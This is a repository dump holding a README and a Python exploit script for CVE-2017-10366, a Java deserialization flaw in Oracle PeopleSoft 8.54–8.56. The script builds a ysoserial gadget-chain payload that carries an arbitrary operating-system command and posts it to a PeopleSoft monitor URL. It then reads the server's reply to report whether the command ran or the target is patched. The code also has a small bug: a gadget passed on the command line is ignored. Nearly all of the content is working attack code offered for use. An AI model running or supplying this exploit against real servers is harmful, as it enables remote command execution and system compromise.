├── README.md
└── CVE-2017-10366_peoplesoft.py


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2017-10366: Oracle PeopleSoft 8.54, 8.55, 8.56 Java deserialization exploit
 2 | 
 3 | This script automates the exploitation of a Java deserialization vulnerability
 4 | in Oracle PeopleSoft, originally discovered by Vahagn Vardanyan.
 5 | 
 6 | This exploit requires ysoserial.jar to generate cross-platform serialized
 7 | Java payloads. ysoserial must be in the same directory as this script.
 8 | 
 9 | PS: It uses ysoserial-modified.jar, which can be found in https://github.com/pimps/ysoserial-modified/
10 | 
11 | Copyright 2016-2018, Blaze Information Security
12 | 


--------------------------------------------------------------------------------
/CVE-2017-10366_peoplesoft.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # CVE-2017-10366: Oracle PeopleSoft 8.54, 8.55, 8.56 Java deserialization exploit
 3 | #
 4 | # This script automates the exploitation of a Java deserialization vulnerability
 5 | # in Oracle PeopleSoft, originally discovered by Vahagn Vardanyan.
 6 | #
 7 | # This exploit requires ysoserial.jar to generate cross-platform # serialized
 8 | # Java payloads. ysoserial must be in the same directory as this script.
 9 | #
10 | # written by Julio Cesar Fort
11 | # Copyright 2016-2018, Blaze Information Security
12 | 
13 | import argparse
14 | import subprocess
15 | from subprocess import PIPE
16 | import os
17 | import requests
18 | import random
19 | import string
20 | import sys
21 | 
22 | ERROR = -1
23 | 
24 | def main():
25 |     parser = argparse.ArgumentParser(description='CVE-2017-10366: Oracle PeopleSoft Java deserialization exploit')
26 |     parser.add_argument('--url', action='store', dest='url', help='Full URL also containing the monitor name/ID. - e.g., http://peoplesoft/monitor/monitor_name')
27 |     parser.add_argument('--gadget', action='store', dest='gadget', help='Gadget for deserialization - default: CommonsCollections5')
28 |     parser.add_argument('--platform', action='store', dest='platform', help='Target platform - must be either powershell, cmd (Windows) or bash (Unix)')
29 |     parser.add_argument('--cmd', action='store', dest='cmd', help='Command to execute on the affected host - default: nslookup google.com')
30 |     
31 |     args = parser.parse_args()
32 |     
33 |     if not args.url:
34 |         print("[!] ERROR: PeopleSoft Monitor URL not supplied.")
35 |         sys.exit(ERROR)
36 |         
37 |     if not args.platform:
38 |         print("[!] ERROR: Target shell not supplied. Must be either 'bash', 'cmd' or 'powershell'.")
39 |         sys.exit(ERROR)
40 |     else:
41 |         if args.platform == "powershell":
42 |             target_platform = "powershell"
43 |         elif args.platform == "bash":
44 |             target_platform = "bash"
45 |         elif args.platform == "cmd":
46 |             target_platform = "cmd"
47 |         else:
48 |             print("[!] ERROR: Unknown platform '%s'" % args.platform)
49 |             sys.exit(ERROR)
50 |         
51 |     if not args.gadget:
52 |         print("[+] Using 'CommonsCollections5' as default gadget.")
53 |         args.gadgets = 'CommonsCollections5'
54 |         
55 |     if not args.cmd:
56 |         args.cmd = 'nslookup google.com'
57 |         print("[+] Using 'nslookup google.com' as default command.")
58 |     
59 |     ysoserial_args = []
60 |     ysoserial_args = ['java', '-jar', 'ysoserial-modified.jar',
61 |                       args.gadgets, target_platform, args.cmd]
62 |     
63 |     try:
64 |         payload = subprocess.Popen(ysoserial_args, stdin=PIPE, stdout=PIPE).communicate()[0]
65 |     except OSError as err:
66 |         print("[!] Error opening ysoserial: %s" % str(err))
67 |         sys.exit(ERROR)
68 |     
69 |     ysoserial_payload = payload
70 |     
71 |     req = requests.post(args.url, data=ysoserial_payload, verify=False)
72 |     
73 |     if "Monitor not activated" in req.reason:
74 |         print("[*] Payload executed successfully!")
75 |         
76 |     elif "The method 'exec'" in req.reason:
77 |         print("[*] Target seems vulnerable but platform may be incorrect.")
78 |             
79 |     elif "invalid stream header" in req.reason:
80 |         print("[*] Target may be vulnerable but serialization payload seems incorrect. Try changing the gadget.")
81 |     
82 |     elif "Unauthorized deserialization attempt" in req.reason:
83 |         print("[!] Target is patched.")
84 |         
85 |     elif "Serialization support for" in req.reason:
86 |         print("[!] Target seems to be patched - Deserialization was disabled.")
87 |         
88 |     elif "Site name is not valid" in req.reason:
89 |         print("[!] Monitor ID invalid.")
90 |     
91 |     else:
92 |         print("[!] Exploit failed. Are you sure the Monitor ID is valid? See the response from PeopleSoft for more information.")
93 |         print("--------------------------------------")
94 |         print(req.text)
95 | 
96 | if __name__ == '__main__':
97 |     main()


--------------------------------------------------------------------------------